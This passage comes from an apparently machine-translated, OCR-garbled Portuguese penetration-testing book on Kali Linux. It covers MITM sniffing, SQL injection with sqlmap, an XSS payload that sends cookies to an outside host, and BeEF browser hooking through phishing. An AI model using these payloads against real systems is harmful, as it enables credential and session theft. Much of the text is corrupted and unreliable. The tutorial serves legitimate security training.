enquanto para a frente IP não está habilitado. 
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Em seguida, langar dsniff para assistir ao trafego. dsniff pode ser encontrado em Sniffing / Spoofing 
|Sniffers de rede, e selecionando dsniff. ATerminal janela será aberta, exibindo 
os comandos de uso para dsniff, como mostrado na imagem seguinte: 


Para iniciar dsniff, tipo dsniff e selecione a interface para farejar usando -le a 

interface. Para o meu exemplo, eu digitei dsniff para capturar todo o tráfego em eth0 como 
mostrado 

na imagem seguinte: 


root@kali:~# dsniff -i eth0 
dsniff: listening on ethQ 


dsniff vai pegar todas as informações de login. Se a vítima registra em um sistema via FTP para 
exemplo, você vai ver a tentativa de login e credenciais uma vez que a sessão é fechada, 
porque dsniff precisa ver toda a sessão. 
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Ettercap 


Ettercap é um conjunto abrangente livre e de código aberto para o man-in-the-middle baseados- 
ataques. 


Ettercap pode ser usado para análise de protocolo de rede de computadores e auditoria de 
segurança, 

com sniffing conexões ao vivo, filtragem de conteúdo e suporte para ativa e passiva 
dissecção de vários protocolos. Ettercap trabalha pondo rede do atacante 

interface em modo promíscuo e ARP para o envenenamento das máquinas vítima. 


Para iniciar Ettercap, navegue até Sniffing / Spoofing |Sniffers de rede e selecione 
o Ettercap gráfica. 


sttercap NO-D. 74 2 


Cotes els 


O primeiro passo é selecionar qual interface você pretende farejar. Navegue até a Farejar tab, 
selecionar o tipo de sniffing (Unified sniffing ou Sniffing em ponte) ea interface você planeja 
para farejar. 


ettercap Nq 


United em 


Bridged sniffing.. Shift+8 


Set pcap filter... P 


ottercap Input 


wy Network interface ; ethO 


OK 
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Agora, Ettercap vai mostrar mais opções de menu, como mostrado na imagem seguinte: 


ottercap NG-0.7.4.2 


Start Targets Hosts View Mitr Filters Loggng Plugins Help 


EITERCAR: 


25 ptugrs 

41 protocol dssectors 

56 ports monitored 
7587 mac verdor fingerprint 
1766 tcp OS frergerprint 


2183 known servees 


Vamos verificar a rede para hosts disponiveis. Navegue para os Hosts e selecione Digitalizar para 
hospedeiros. Ettercap rapidamente digitalizar toda a classe Ce listar todos os hosts identificados. 


Geralmente 
o roteador é o primeiro anfitrião que se encontra. A figura a seguir mostra quatro dispositivos 


encontrado durante uma verificação. 


Host List N 


IP Address MAC Address Description 


172.16.76.2 
172.16.76.128 @0:0¢ 


172.16.76.254 O 


DeLete Host Add to Target 1 Add to Target 2 


Neste exemplo, encontramos quatro dispositivos. Podemos supor .1 é o roteador, e nós 
será alvo da máquina da vítima 0,128. Vamos selecionar o roteador para Meta 1 e 

a vítima 0,128 para Meta 2. Isto irá colocar o nosso sistema entre a vítima 

e um roteador para um ataque clássico man-in-the-middle. Selecione cada alvo, e clique no 
caixa de seleção apropriada. Você pode verificar as metas, navegando até Alvos e 
selecionando Alvos atuais. 


Delete Host Add to Target 1 | Add to Target 2 


J hosts added to the hosts List... 
andomizing 255 hosts for scanning... 


canning the whole netmask for 255 hosts, 
4 hosts added to the hosts list... 

tost 172.156.76.1 added to TARGET1 

ost 172.16.76.128 added to TARGET 2 
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Em seguida, podemos olhar para as opções de man-in-the-middle encontradas embaixo da aba 
MITM. 


Há opções para Envenenamento ... Arp, ICMP redirecionar ..., Port roubar ..., e Dhcp 
spoofing .... Para este exemplo, vamos selecionar Arp envenenamento ... e escolher o Farejar 


conexões remotas parâmetro. 
Polo Filters Logging 


Arp poisoning. 
lemp redirect... 
Port stealing.. 


Dhcp spoofing 


Stop mitm attack(s) 


MITM Attack: ARP Polsoning (as nobody) 


Optional parameters 
v Sniff remote connections. 


Only poison one-way, 


OK Cancel 


Agora, estamos prontos para capturar o tráfego entre o roteador e nosso vítima. Interessante 
informações, tais como nome de usuário e senha, podem ser capturados e 
exibido na janela de execução. 


Emalhe 


Emalhe é uma ferramenta de man-in-the-middle usado para capturar imagens de tráfego de rede ao 
vivo. 

Emalhe exige um ataque man-in-the-middle a ser estabelecido antes de trabalhar. Você 

pode aproveitar a arpspoof e dsniff ou métodos Etthercap anteriormente coberto para 

lançar o seu ataque man-in-the-middle antes de lançar redes de deriva. Emalhe pode ser 
executados simultaneamente para dar-lhe rapidamente a visibilidade de todas as imagens voando 
o fio. 
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Emalhe pode ser encontrado em Sniffing / Spoofing |Sniffers Web e selecionando 

Emalhe. Emalhe abrirá como um Terminal mostrando como usar a ferramenta. Você irá 

precisa especificar qual interface você quer cheirar eo que você quer fazer com 

imagens captadas fora do fio. Por exemplo, você pode optar por ter um sinal sonoro 

para cada imagem usando o -B imagens de comando, exibição na tela do terminal, ou 

enviar imagens capturadas para um diretório. A captura de tela fornecido mostra um exemplo de 
a captura de imagens a partir de etho e colocando as imagens em uma pasta localizada no / Root / 
Desktop / Capturedimages. 


a4 O exemplo a seguir supõe um ataque existente man-in-the-middle é 
\ estabelecida usando ethO como a porta de escuta. 


:~# echo 1 > /proc/sys/net/ipw4/ip forward 


Depois de emalhe é langado, um separado em branco Terminal janela pop-up. Se vocé 

ter dito emalhe para exibir imagens, eles aparecerao nesta janela. Se vocé selecionou 

não para exibir imagens, como o uso -Um, As imagens nao aparecem, no entanto, ser enviados para 
a pasta especificada no comando de execução. A imagem seguinte é emalhe 

a captura de imagens a partir de um surf vítima www.drchaos.com. 


ten hee em 


NR Ni ileso = 
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SQL Injection 


Um banco de dados armazena dados e organiza-lo em algum tipo de forma lógica. Oracle e 
Microsoft SQL são exemplos populares de sistemas de gerenciamento de banco de dados que 
permitem 

usuários para criar vários tipos de bancos de dados usados para armazenar, consultar e organizar 
dados 


de RIM S HIYA, Language, que é mais conhecido como SQL, é o sublinhado 

linguagem de programação comum que é entendido pela maioria de gerenciamento de banco de 
dados 

sistemas. Ele fornece uma maneira comum para a aplicação para acessar os dados no banco de 
dados 


BREDA MMS EMPATA BULA SB IDO SAPO RENA SEES MORREN" saída que 


não devem ser visualizadas. Às vezes, isso é tão simples como o atacante pedindo 

informações privilegiadas do sistema de gerenciamento de banco de dados. Outras vezes, é 
aproveitando configurações pobres por administradores de banco de dados. Atacantes podem 
também tirar proveito de uma vulnerabilidade no sistema de gerenciamento de banco de dados que 
permite que o invasor ver ou escrever comandos privilegiados de e para o banco de dados. 


Atacantes tipicamente enviar código malicioso através de formulários ou de outras partes de uma 
página web 

que têm a capacidade de aceitar a entrada do usuário. Por exemplo, um atacante pode entrar 
aleatória 

personagens, bem como as declarações de comprimento, com o objetivo de identificar a fraqueza na 
forma como 

as variáveis de entrada e parâmetros são concebidos. Se um campo de entrada está definido para 
aceitar apenas a . ds ea 

Gselvalin as aee PchiackBarcv air Ae SPER Sake dniRige eee RÉIR consultas 


Babrententro Splisitaçães Pidlos@ Hk ginhiagkdeay. também irá permitir que um verificador da penetração 
examinar as informações HTTP POST. 
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Banmeldes 


No exemplo a seguir, vamos tentar realizar uma injeção de SQL no site 

DrChaos.com. Vamos navegar para www.DrChaos.com usando o Firefox em nosso Kali 
console do servidor e tentar entrar no site. Primeiro, vamos tentar o nome de usuário 
administrador ea senha 12345 se autenticar. Você verá que irá falhar. 


Agora, navegue até o Vista barra de menus no Firefox e selecione o HackBar menu. Clique 
o Carga URL botão e clique no Ativar dados Postar botão. Você vai ver a URL que 
foram entrando em, bem como o nome de usuário e senha que apenas tentada. 


INT v|= @ SQ XSS¥ Encypoony Ercodingy Othery 
wy Load URL 
É spit UAL 
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Vamos agora adicionar uma aspa simples após o nome do usuário administrador. Assim que 
clicamos na Executar botão, nós recebemos uma injeção de SQL. Isso pode significar o servidor 
é vulnerável a injeção de SQL, porque o servidor está respondendo a erros de SQL. 


nT t =- o SAY KSSY Encrymion® Encodingy Other" 


w Logd UAL 
a spitu 
+ Eate 


O Emable Pont data Enable Reterres 
Post dete 


Error; You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for 
the right syntax to use near ‘Ba7cchleeata706e4c 4016891 f84e7b" at line À 

Error No; 1064 

SELECT * FROM user WHERE username = “administrator” AND password = 

E celiiera Ra 706040344 16891 FR4e7 by 


Vamos colocar em injeção SQL, adicionando um OR 1 = 1 4 # declaração no final de 
a linha. 


| INT vo = o SOL XSS¥ Encryptiony Encocingy Others 
we load URL 

2 glitur 
+ Execute 


© Enable Post data C Enable Referrer 
Post data ’ 


Uma vez que executar o código, que esta conectado como administrador para www.drchaos.com. 


Dashboard 
Welcome to WordPress 


Ge Sevtes war bups 
Write yos ten biog gost 


ASA on (out wap 


| Geet 
Q tepes 
tp Cogeres 


3] Ta 2 Sem 


There Tacribag [Mmgatro vermar im 6 Wagers 
You se veng @ard?ress 351 
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Temos remendado www.DrChaos.com para que ele não é vulnerável a este ataque. 

No entanto, você pode ver injeções SQL são muito valiosos para o ataque, porque eles 
dar um verificador da penetração da web um método fácil para obter acesso total a um 
sistema. 


Sucesso injeção de SQL é dependente do conhecimento atacantes de comandos SQL. Se 
você precisa escovar acima em suas habilidades de SQL, recomendamos olhando W3 School of SQL 
em: http:/Awww.w8schools.com/sql/sql_intro.asp. 


SalMap 


SalMap automatiza o processo de detecção e exploração de falhas de injeção SQL e 

tomando conta de servidores de banco de dados. SalMap vem com um mecanismo de detecção, 
bem como um 

ampla gama de recursos de testes de penetração que variam de banco de dados de impressões 
digitais 

para acessar o sistema de arquivos subjacente e executar comandos no sistema operacional 


sistema através de liga ões de fora-de-banda. , f 
s recursos incluem orte para sistemas de gerenciamento de banco de dados comum, o apoio 
à 


muitas técnicas de injeção SQL, usuários, enumerando os hashes de senha, e muitos 
outros. SqiMap também apoia o processo de banco de dados 'user escalonamento de privilégios 
usando 


Notas clero MARGIT RIRA para explorar servidores de banco de dados e é 


construído em Kali. Para 
SalMap usar, você vai precisar para apontar a ferramenta para uma URL de um script SQL em um 
servidor web. 


FSRS pode Bheshidenstinadessee ara Res aarelABmie leva innedtadd Blanco de dados | 


SalMap. ATerminal janela será aberta exibindo a página SalMap ajuda. 

A sintaxe básica para usar SqliMap é: 

SqlMap-u URL - função 

Uma função comum é dbs. O dbs palavra-chave terá SqlMap obter os bancos de dados. 


SqlMap-u http://www .drchaous.com/article.php?id=5 - dbs 


Você pode ver a partir de nossos resultados, temos várias bases de dados que foram 
encontrados. Para esta 
exemplo, vamos concentrar-se no banco de dados de teste. 
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Depois de ter encontrado um servidor web vulnerável, você seleciona o banco de dados usando o 
-D comando e o nome da base de dados. 


SqlMap-u teste http://www .drchaos.com/article.php?id=5-D - tabelas 


O mesa palavra-chave é usada para recuperar todas as tabelas no teste banco de dados em nosso 
web 
servidor. Vemos que temos recuperado com êxito duas tabelas, administrador e conteúdo. 


Uma vez que você execute o seguinte comando, SqlMap irá exibir todas as tabelas: 


SqlMap-u http://www .drchaous.com/article.php?id=5 Teste D-- tabelas 


Colunas específicas podem ser selecionados usando o seguinte comando: 


SqlMap-u http://www .drchaous.com/article.php?id=5 -T tablesnamehere 
- colunas 


Se houver alguma informação relevante nas tabelas, ele pode ser recuperado usando o 
seguinte comando: 


SqlMap-u http://www .drchaous.com/article.php?id=5 -T-L tablesnamehere 
teste - despejo 


-U teste-dump 


Isso irá criar um arquivo chamado teste, E despejar toda a informação bruta do 

tabela de banco de dados para esse arquivo. Em muitos casos, isso pode incluir senhas e 
outras 

informações confidenciais. 


Cross-site scripting (XSS) 


Cross-site scripting (XSS) é uma vulnerabilidade encontrada em aplicações web. XSS permite 
atacantes para injetar os scripts no site. Esses scripts podem ser usados para manipular 
o servidor web, ou os clientes que se conectam ao servidor web. 


Cross-site scripting foi responsável por uma grande maioria de ataques baseados na web populares. 
Muitas vezes, quando minha equipe é solicitada pelos clientes para examinar comprometida 
servidores web que tiveram dados roubados, foi resultado de cross-site scripting. 

Ataques cross-site scripting resultaram em atacantes desfigurar sites, distribuindo 

malwares para os clientes, e roubar informações sensíveis a partir de sites, como o crédito 

cartão e outras informações de identificação pessoal. 
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Um método para verificar se há vulnerabilidades cross-site scripting é verificar se uma entrada 
campo, como uma caixa de pesquisa, é vulnerável. Um exemplo que pode ser utilizado para testar 
um 

campo de entrada em um site está usando a sequência de pesquisa simples da seguinte maneira: 


CHAOS <script> alert ((www.DrChaos.com’') </ script> 


Você pode usar o script anterior para testar qualquer site no entanto, não recomendamos 
introduzir a corda em cada site que você se deparar, como poderia alertar as metas de seu 
intenções maliciosas. Se você optar por usar um script semelhante para testar cross-site scripting, 
certifique-se de usar um outro site que não seja www.DrChaos.com no script. 


Testando cross-site scripting 


Google criou o projeto Gruyere como um meio para testar exploits aplicação web 

e defesas. site O projeto Gruyere tem várias vulnerabilidades embutidos 

para ele, incluindo XSS. Você pode executar o seu próprio projeto de Gruyere on-line, ou você 
pode 

transferi-lo para uma máquina local para o seu teste. 


Web Application Exploits and Defenses 


À Codelals by Bruce Leian, Mugcha Bendre, and Parisa Tabriz 


Uma vez que foram registrados em nossa propria instancia de Gruyere, fomos capazes de copiar o 
sequéncia anterior no campo de entrada nome de usuario e clicar no Submeter botao. O 
imagem seguinte mostra a home page com o Gruyere CHAOS roteiro exibido. 


A cadeia utilizada no campo de entrada é a seguinte: 


CHAOS <script> alert ('www.DrChaos.com' </ script> 


—— - 


| Hama | My Snppats | Nem Snippet! Upload CHAGS<scriptale <CHAOS 
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Uma vez que executou o script de XSS no campo de entrada nome de usuário, notamos algum 
código foi 

exibido no site. Neste ponto, nós fomos capazes de gerar um alerta pop-up 

sempre que o nome de usuário era visto no site. 


wwwbrthaos com 


Além disso, http://xss.progphp.com/ é um outro site popular para testar ataques XSS 
e scripts. Você pode ter vários scripts e introduzi-lo no site para ver como 
XSS interage com sites e seu próprio navegador web de forma segura. 


Cookie de XSS roubo / Autenticação 
sequestro 


Script kiddies pode usar XSS para a geração de alertas pop-up no entanto, como um profissional 
Verificador da penetração, o valor real de XSS é para obter acesso privilegiado a um sistema. 

A próxima seção irá examinar como fazer isso. Se você não tiver feito isso, criar 

seu próprio exemplo Gruyere online para testar conceitos a próxima seção. 


Navegue até http://google-gruyere.appspot.com/start. App Engine será iniciado 

uma nova instância de Gruyere para você, atribuir-lhe uma identificação única e redirecioná-lo para 
http://google-gruyere.appspot.com/123456/ (Onde 123456 é o único 

ID para este exemplo). 


Cada instância de Gruyere está completamente isolado de todos os outros casos, para que o seu 
instância não será afetado por qualquer outra pessoa usando Gruyere. Você precisa usar o seu 
identificação única, em vez de 123456 em todos os exemplos. 


Se você quiser compartilhar o seu trabalho e projeto de concluir em Gruyere com alguém 

outra coisa (por exemplo, para mostrar-lhes um ataque bem-sucedido), basta compartilhar a URL 
completa com 

seu amigo, incluindo a sua identificação única. 


Não use a mesma senha para sua conta Gruyere como você usa para qualquer serviço real. 


Vamos examinar um exemplo do uso de uma vulnerabilidade XSS para roubar um cookie de sessão. 
Se você tentar esta técnica em uma rede local, o Kali caixa e servidor web vulnerável 

deve ser capaz de comunicar. Como estamos usando projeto Gruyere, precisávamos 

colocar nossa caixa de Kali Linux na Internet com um endereço IP voltados ao público, de modo Kali 
Linux 

pode se comunicar corretamente com o servidor Gruyere alvo. 
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. Normalmente, dando Kali Linux um endereço IP público é realmente uma má 
prática. Executar este passo pode significar a abertura de firewalls e 
tendo Kali Linux exposta a ataques remotos. 


Quando você entrar em Gruyere, crie um nome de usuário, clicando no Inscrever-se botão 
na tela lado superior direito, como mostrado na imagem seguinte: 


Sign in! Sign up 


Gruyere: Sign up 


Sign up for a new account. 


User name 


WARNING: Gruyere is not secure. 
Do not use a password that you use for any real service 
Do not upload any personal or private data 


Create account 


Para este exercicio, criamos duas contas separadas. Vamos entrar com a primeira conta. 
Para o nosso exemplo, a nossa primeira conta é intitulado TheDude. Em seguida, vamos para o trecho 


seção e criar um novo trecho. Iremos introduzir um script de XSS aqui como mostrado na 
tela a seguir: 


Add a new snippet. 


<script-document.write("<img 
src='http:lkali drchaos.comivariwwwixss labfab seriptphp?"+docu 
ment.cookie+"'>"}<'script> 


Limited HTML is now supporied in snippets (e.g., <b>, 
<P, etc.)! 


Submit 


Sabemos Gruyere tem vulnerabilidades XSS embutido, e, portanto, estamos usando 

um script. No mundo real, podemos usar o mesmo script em qualquer campo em um alvo 
site para testar se é vulnerável a XSS. Por exemplo, se soubéssemos Facebook foi 
vulnerável a um ataque XSS explorar o campo nome do meio, um invasor 

precisa criar um perfil e usar este script como o seu nome do meio. 
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Facebook é não explorável usar este ataque. É apenas um exemplo hipotético. 
Entramos no seguinte código: 


<script> document.write ("<img src = ‘http://kali.drchaos.com/var/www/xss _ 
laboratório / lab_script.php? "+ document.cookie +"> ") </ script> 


E Embora as palavras pode envolver em torno de como você digitar o comando, ele pregisa 
$. “ serum único comando de linha. 


Este é apenas um dos muitos scripts que podem ser usados para explorar um sistema vulnerável. 

O foco deste livro está alavancando ferramentas disponíveis no Kali Linux, no entanto, o melhor 
Testadores de penetração usam uma variação de ferramentas disponíveis do setor, como Kali Linux, 
e 

ferramentas personalizadas, como scripts XSS de violação alvos. Sugerimos a investigar este tema 
e testar novos scripts contra o seu alvo exemplo Gruyere para dominar a habilidade de 

construir e executar ataques de script personalizado. 


Outras 


forteanentasiras ferramentas que seguem o tema deste Chatper e disponível em Kali 
Linux: 


urisnarf 


urlsnarf é uma ferramenta que gera todas as URLs solicitadas cheirou de tráfego HTTP em 
Formato de log comum (CLF, usado por quase todos os servidores web), adequado para off-line 
pós-processamento com o seu web log análise ferramenta favorita (analógico, wwwstat e 

assim por diante). 


Para acessar urlsnarf, navegue até Sniffing / Spoofing |Sniffers de rede e 
selecionar urlsnarf. A Terminal irá aparecer apresentando opções de uso, como mostrado na 
a tela a seguir: 


root@kali: ~ 


ermnal Heip 


Para usar urlsnarf, tipo urlsnarf-i ea interface que você deseja monitorar. urlsnarf 
irá mostrar que está ouvindo. Esta captura de tela a seguir mostra urlsnarf lista para ethO: 
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urlsnarf irá exibir um dump de qualquer pedido de URL visto no fio. Por exemplo, 
um usuário de Windows acessos www.thesecurityblogger.com. As solicitações de URL são 
apresentado em urlsnarf para uso futuro. 


acccheck 


acccheck é uma ferramenta de ataque de dicionário senha que tem como alvo a autenticação do 
Windows 

utilizando o protocolo SMB. acccheck é um script invólucro em torno do binário smbclient, 

e, como resultado, é dependente dele para a sua execução. 


hexinject 


hexinject é um injetor pacote versátil e sniffer que fornece uma linha de comando 

estrutura para o acesso à rede cru. hexinject é projetado para trabalhar em conjunto com outros 
utilitários de linha de comando, e por esta razão que facilita a criação de poderosos 

shell scripts capazes de leitura, interceptar e modificar o tráfego da rede em 

de forma transparente. hexinject pode injetar qualquer coisa na rede, bem como 

calcular os campos de checksum e tamanho do pacote de protocolos TCP / IP. 
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Patator 


Patator é um multi-purpose utilitário de força bruta, com um design modular e flexível 
uso. Capacidades do patator incluem FTP, SSH-forçando bruta, Telnet, SMTP, HTTP / 
HTTPS, POP, IMAP, LDAP, SMB, MSSQL, Oracle, MySQL, DNS, SNMP, e 

arquivos de senha. 


DBPwAudit 


DBPwAudit realiza auditorias on-line de qualidade de senha para vários banco de dados 
motores. O aplicativo é projetado para permitir a adição de drivers de banco de dados adicionais 
copiando novos drivers JDBC para o JDBC diretório. 


Resumo 


Comprometer autenticação permite que um atacante passar por uma pessoa autorizada. 
Isto pode ser útil quando as aplicações web de teste de penetração, porque ter 
acesso autorizado significa ignorar a maioria das defesas de segurança tradicionais. 


Capítulo 5, Atacar de autenticação, focado em atacar como os usuários e sistemas 

autenticar. Começamos, fornecendo uma visão geral dos diferentes métodos utilizados 

para confirmar a identidade. A próxima seção coberto atacar o processo de gestão 

sessões de autenticação. Em seguida, avaliou-se como os dados de sessão é armazenado em um 
usuário de 

navegador por comprometer a gestão cookie. Nós, então, coberto como capturar 

as sessões de autenticação por escondendo entre os alvos utilizando várias formas de man-in-the- 
um ataque pelo meio. Vulnerabilidades de autenticação As duas seções finais avaliadas web 
servidores de aplicações, tais como injeção de SQL e cross-site scripting. 


O próximo capítulo irá cobrir ataques remotos ou da Internet para servidores e clientes. 
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O foco deste capítulo será sobre ataques baseados na Internet. Os administradores de segurança 
para as organizações estão conscientes de que há partidos maliciosos na Internet, 

continuamente à procura de maneiras de penetrar qualquer rede que se deparar e em 

defesa, os administradores têm medidas de segurança no local. Defesas comuns incluem 

Firewalls, IPS / IDS, produtos de segurança baseados em host, como anti-vírus, filtros de conteúdo, 
etc No passado, essas defesas foram suficientes, no entanto, as ameaças estão se tornando mais 
sofisticado hoje em dia, com a capacidade de contornar comercial da prateleira ou 

soluções de segurança "COTS". As ferramentas abordadas neste capítulo incluem métodos 

Kali Linux, utilizado para contornar as defesas de segurança padrão a partir de uma localização 
remota. 


Este capítulo termina arsenal de ataque do verificador da penetração. Após analisar o material 
coberto nos capítulos anteriores, você deve entender como conduzir reconhecimento 

em um alvo, identificar vulnerabilidades do servidor e do lado do cliente, e as técnicas utilizadas para 
explorá-los. Este capítulo irá cobrir o elemento final de ataque relacionado ao uso de web 

aplicações como um front-end. Além disso, vamos explorar como tirar proveito do 

próprio servidor web e de compromisso aplicações web usando exploits, como navegador 

ataques de exploração, ataques de proxy e colheita senha. Nós também irá abranger 

métodos para interromper serviços utilizando técnicas de negação de serviço. 


Exploração Navegador Quadro - Carne 


=eEF 


Ataques na Web 


Vulnerabilidades do browser pode ser explorada por um software malicioso para manipular o 

o comportamento esperado de um navegador. Essas vulnerabilidades são um vetor de ataque 
popular, 

porque a maioria dos sistemas de acolhimento alavancar algum tipo de software navegador de 
Internet. Vamos 


pull CIB HERO LM HS [BEAU HERO RHA ABER QUEREM Ser Ipraugbagapilidades do 


| de hackers, como um dos nossos favoritos conhecido como Exploração Navegador 
Quadro (Carne). A carne bovina é um pacote baseado em navegador explorar esse "ganchos" um ou 
mais 
navegadores como cabeças de ponte para o lançamento de ataques. Um usuário pode ser ligado 
através do acesso a 
URL personalizado e continuar a ver o tráfego da web típico, enquanto que um atacante tem acesso 
para a sessão do usuário. Beef ignora appliances de segurança de rede e host-based, anti- 
aplicações de vírus visando os vulnerabilidades encontradas em navegadores comuns, tais como 
Internet Explorer e Firefox. 
Carne bovina não está incluído com a versão 1.0 do Kali Linux, mas pode ser encontrada 
em 
beefproject.com. Esperamos carne bovina para ser adicionado em uma versão futura do Kali 
Linux com base em sua popularidade na comunidade de testes de penetração. 


Para instalar a carne, abra um terminal de comando em Kali Linux como usuário root e emissão 
os seguintes comandos: 


apt-get update 
° apt-get install carne-XSS 


# apt-get update 


Você pode ser solicitado a instalar, atualizar ou substituir alguns arquivos mais antigos quando você 
executar o 

apt-get update comando. Na maioria dos casos, você pode simplesmente aceitar as instruções padrão. 
Quando o processo de atualização for concluído, você pode usar apt-get instalar Beef: 


# apt-get install 


Uma vez que o processo for concluído, você terá de carne bovina instalado no Kali Linux. 
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Para iniciar a carne, navegue até / Usr / share / carne-XSS diretório e tipo . / Carne para iniciar 

o servidor de carne bovina. Uma vez que começa a carne bovina, as URLs para gerenciar Carne de 
gancho vítimas vontade 

ser exibido na janela de terminal: 


root@kali: /usr/share/beef-xss 


Para acessar o servidor de administração, abra um navegador e vá para a / Ui/ painel 
URL. Quando enganando a vítima para ser fisgado por carne bovina, redirecionar as vítimas para o 
URL do servidor gancho de carne bovina listados como hook.js. Você vai precisar para desenvolver 


uma estratégia para obter 
as vítimas para acessar sua URL gancho, como um phishing ou ataque de engenharia social, 


que redireciona os usuários para carne bovina. 
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Neste exemplo, iremos para: http://172.16.86.144:3000/ui/panel. Padrão 
nome de usuário e senha são carne bovina. 


Quando a vítima clica ou é redirecionado para o site "hook.js", o atacante do 

Servidor Beef verá o navegador viciado. Beef irá adicionar o novo sistema para uma lista de 

metas e exibi-las se a vítima é viciado online. Desconectado vítimas se tornarão 

vulnerável a ataques, uma vez que se reconectar à Internet, independentemente se eles acessam 
o link gancho antes de voltar a usar a internet. A próxima imagem mostra principal de carne bovina 
painel de instrumentos e opções disponíveis para lançar contra um sistema viciado: 


L a am st cata ere 


q 
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O exemplo anterior mostra um laptop ligado do Windows. Carne bovina pode revelar os detalhes, 

por exemplo, se a vítima está usando o Firefox, o Windows 32, plugins de navegadores específicos, 
scripts, se o Java está ativado e outras informações úteis. O atacante pode 

executar comandos em máquinas em forma de gancho, como fazer um som carrilhão, sessão grab 
cookies, capturas de tela captura, registrar as teclas digitadas, e até mesmo usar o navegador viciado 
como 

um proxy para atacar outros sistemas. Outro exemplo é ter o registro do sistema viciado 

no Facebook e usando carne bovina para capturar o cookie de sessão. Um atacante pode responder 
para a sessão autenticada e ter acesso total a conta do Facebook da vítima. 

As possibilidades para o mal ea destruição são infinitas. Esta cabeça de ponte poderia permitir que 
um 

atacante acesso irrestrito para o navegador do usuário e todas as informações que é necessário para 
acessá-lo. 


Carne bovina fornece os detalhes dos sistemas de gancho e registra os comandos que são 
executado. Ambos os detalhes dos hosts individuais e log de comando executado com sucesso 
informação pode ser copiado para um relatório final final: 


Logs Commands Rider 


Type Event 
Event 0,003s - [Focus] Browser has regained focus. 
Event 3.769s - [Blur] Browser has lost focus. 


Zombie 127 .0.0.1 just joined the horde from the domain: 127 .0.0.1:3000 


Hacked Browsers 
4 Oj Onhe Browsers ! 
44)2700.1 Details Logs =ommands Pick MOsF ays Ipes 


sting Stated ons Current Browser 


9 8827001 


| a Category Browser (13 Items] 
| Ottine Browsers 


Browser Name: UNKNOWN 

Browser Version. UNKNOWN 

Browser UA String Mozila50 (X11, Linux 686; ru 210) Gecko20100101 Firetoxi21 0 
Browser Plugins: Groma Shel Integranon 
Window Size: Wicth. 924, Height. 510 
Java Enabled: Ho 

VBSeript Enabled: Mo 

Has Flash. Yes 

Has GoogleGears: No 

Has WebSockets. Yes 

Has ActiveX Ho 

Session Cookies Yes 

Persistent Cookies: ves 


4 Category: Hooked Page (5 Items] 
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Defendendo contra ferramentas de penetração baseados em navegador é difícil. A melhor defesa é 
garantir que todos os softwares baseados em navegador é atualizado com as últimas versões e 
patches de segurança, juntamente com a desativação do navegador de executar Flash e Java. Em 
soluções disso, de segurança que podem detectar ameaças baseadas em aplicações comuns, tais 
como Próxima Geração de Intrusão Sistemas de Prevenção (NGIPS) pode fornecer um extra 
camada de segurança. A maioria das vítimas de ferramentas de penetração, como carne bovina são 
usuários 

que clicar em links incluídos em e-mails ou convidados de mídia social que se apresentam como 
uma parte confiável 

compartilhando coisas envolvidas com links maliciosos / software / código e assim por diante. 


FoxyProxy - Plugin do Firefox 


Se você planeja usar proxies para testar aplicações web, como Zed Proxy Ataque 

(ZAP) ou BURP, você pode querer usar o plugin do Firefox FoxyProxy para simplificar 

alternando entre, bem como permitir o uso de Proxy. FoxyProxy é uma extensão do Firefox 

que permite que você gerencie facilmente, mudança, habilitar ou desabilitar as configurações de proxy 
no Firefox. 

Você pode baixar FoxyProxy do Firefox add-on biblioteca. 


Uma vez FoxyProxy está instalado, haverá um icone adicionada no topo do Firefox 
janela do navegador. Clique sobre isso para abrir a caixa de diálogo Opções FoxyProxy: 
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Select Mode: | Completely disable FoxyProxy 


DOS ms Proxy Subscriptions | Pattern Subscriptions 8 Global Settings = QuickAdd 4 AutoAdd = Logging 


Prony Noses n de Move Up 
These are the settings that are used.. 


JP vos 


Wadd New Proxy 


BPicase Donate Cet FomyPromy Plus | (G Buy Proxy Service | | FoxyProxy tor Chrome 


Para adicionar um proxy para FoxyProxy, faça o seguinte: 


1. Clique no Adicionar Novo Proxy botão, e uma nova janela será aberta. 
2. Selecionar Configuração manual do proxy. 
3. Digite o endereço IP ou host eo número da porta do servidor proxy. 


4. Clique em Ok para salvar o novo proxy. 


(*) Manual Proxy Configuration 
Help! Where are settings for HTTP, SSL, FTP, Gopher, and SOCKS? 


Host or IP Address | 127.0.0.1 


SOCKS proxy? SOCKS vt/4a .* SOCKS v5 


Neste ponto, FoxyProxy esta desativado permitir todo o trafego sem um proxy no lugar, como 
estabelecido Desabilitar completamente o FoxyProxy no separador superior. Para usar um proxy, 
clique na guia 

e altera-lo para o seu proxy desejado. Esta caracteristica faz com que seja facil para alternar entre ou 
desativar proxies no Firefox rapidamente: 


Select Mode: | Completely disabie FoxyProxy 


Use proxies based on their pre-defined patterns and p 
Use proxy “127.0.0.1:8080° for all URLs 
Use proxy “Default” for all URLs 
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BURP Proxy 
E BURP 


Arroto Procuração é uma ferramenta que intercepta tráfego HTTP e HTTPS. Ela permite uma 
penetração 

Testador ao analisar um pedido, suas vulnerabilidades, eo de duas vias de tráfego entre 

um cliente e um servidor web. Arroto Procuração é muito popular por causa de sua capacidade de 
não 

só examinar o tráfego, mas também, ele manipula solicitações. Vamos examinar como 


rroto Procuração é usado para manipular, responder e roubar autenticação. . ? 
Ê importante fmbrar que O TOLO Procuração É realmente uma parte dé Kirp Suite, que é 


uma coleção de ferramentas. Quando um usuário digita uma URL no seu navegador da Web, como 
http:// 

www.DrChaos.com, Eles esperam para ser direcionado para o site. Um servidor proxy 

interceptar esse pedido e enviá-lo em nome de um cliente. Os servidores proxy são normalmente 
postas em prática para inspecionar o tráfego e proteger os clientes a partir de dados nocivos. Como 
Verificador da penetração, você pode usar um servidor proxy para interceptar o tráfego de um cliente, 
copie 

o pedido, ou manipulá-lo: 


| o tempo atual 


a Perrine o que Bod, 0 dú é 
lé , 
eg atua od 
+ a 


ses 


Alice Procuração Prumo 


o eee, ee et 


Je “Bob diz que a RE sad i O tempo 
Ke tempo é 07:00 2 S é 7:00 


Para iniciar Burp Suite, basta navegar até: Barrilha |Sniffing / Spoofing |Sniffers Web 
e selecione Burp Suite. 
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Uma vez Arroto Suite é lançado, você será presenteado com o painel de instrumentos lançamento 
Burp: 


Burp Suíte Free Edition v1.5 


kap intrude Rapata Window bist 


r -itdeg eet ford tame beeing CSS image and general brary content: “cing do» remporses Ping emoty fodas 


Host Method UnL Fora | n. à Length MILE os Ite 


ax 


E == ] =] 


fee Hes 


Para configurar Burp, clique no Procuração guia. Por padrão, o Interceptar botão é selecionado 

neste guia. Quando o Interceptar opção é ativada, Burp pára todos os pedidos a partir de um 
